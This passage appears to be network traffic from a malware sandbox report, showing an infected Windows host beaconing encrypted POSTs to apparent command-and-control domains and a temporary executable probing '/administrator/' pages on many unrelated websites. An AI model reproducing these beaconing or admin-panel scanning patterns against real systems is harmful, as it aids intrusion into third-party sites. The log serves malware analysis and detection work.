Nov 30, 2023 11:21:38.949613094 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:21:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49790	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:46.452825069 CET	333	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bihkhubisnpf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:21:46.452888966 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:21:46.689146042 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:21:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49791	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:21:55.840970039 CET	335	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://otxouljuywjpsw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:21:55.840970039 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:21:56.085268021 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:21:55 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49792	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:08.534372091 CET	337	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uwkltcoolnthhwjg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:22:08.534415007 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:22:08.773010015 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:22:08 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49796	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:20.861888885 CET	336	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hyxyetpogtskvpn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:22:20.861917973 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:22:21.108103037 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:22:20 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49797	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:24.767591000 CET	340	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rupjnrdjpqmfylj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 187 Host: humydrole.com
Nov 30, 2023 11:22:24.767591953 CET	241	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 30 55 b6 ee Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA .[k,vu0U?W[tCx:Ns<&vf3p2Z ahZ(KP9<uusTV0qOZd3
Nov 30, 2023 11:22:26.358736992 CET	306	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:22:25 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 7 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 03 00 00 00 72 e8 85 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49798	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:26.675678015 CET	336	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jhiybculfro.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 148 Host: humydrole.com
Nov 30, 2023 11:22:26.675710917 CET	202	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 32 00 eb ad Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vu2h!mJNmTUC=.2L$mv)T6Zz+.JUV,h
Nov 30, 2023 11:22:27.931068897 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:22:27 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49801	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:32.218496084 CET	333	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pkedugtuhtge.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:22:32.218575001 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:22:32.462471962 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:22:32 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	51380	3.33.224.147	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:36.443393946 CET	224	OUT	GET /administrator/ HTTP/1.1 Host: hna.be Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:36.551909924 CET	508	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 30 Nov 2023 10:22:36 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://hna.be/administrator/ X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Nov 30, 2023 11:22:36.757811069 CET	508	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 30 Nov 2023 10:22:36 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://hna.be/administrator/ X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Nov 30, 2023 11:22:37.701895952 CET	233	OUT	GET /administrator/index.php HTTP/1.1 Host: hna.be Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:37.810357094 CET	517	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 30 Nov 2023 10:22:37 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://hna.be/administrator/index.php X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	51377	104.238.144.219	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:36.499825001 CET	227	OUT	GET /administrator/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:36.633645058 CET	548	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:36 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/administrator/ Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/administrator/">here</a>.</p></body></html>
Nov 30, 2023 11:22:36.683912039 CET	236	OUT	GET /administrator/index.php HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:36.817807913 CET	566	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:36 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/administrator/index.php Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/administrator/index.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	51378	104.238.144.219	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:36.499882936 CET	227	OUT	GET /administrator/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:36.630527973 CET	548	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:36 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/administrator/ Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/administrator/">here</a>.</p></body></html>
Nov 30, 2023 11:22:36.681364059 CET	236	OUT	GET /administrator/index.php HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:36.812115908 CET	566	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:36 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/administrator/index.php Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/administrator/index.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	51737	15.197.142.173	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:36.629791021 CET	225	OUT	GET /administrator/ HTTP/1.1 Host: m7l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:36.731121063 CET	418	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:36 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-17.ec2.internal X-Request-Id: cbfa7b29-d36d-4e3d-a486-e160b8eb28b4 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Nov 30, 2023 11:22:37.499633074 CET	274	OUT	GET /administrator/index.php HTTP/1.1 Host: m7l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://m7l.com/administrator/
Nov 30, 2023 11:22:37.601931095 CET	419	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:37 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-123-117.ec2.internal X-Request-Id: 48c66a3e-843d-4c48-a760-4b24559a1e4c Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	51738	199.59.243.225	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:36.631462097 CET	223	OUT	GET /administrator/ HTTP/1.1 Host: ia.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
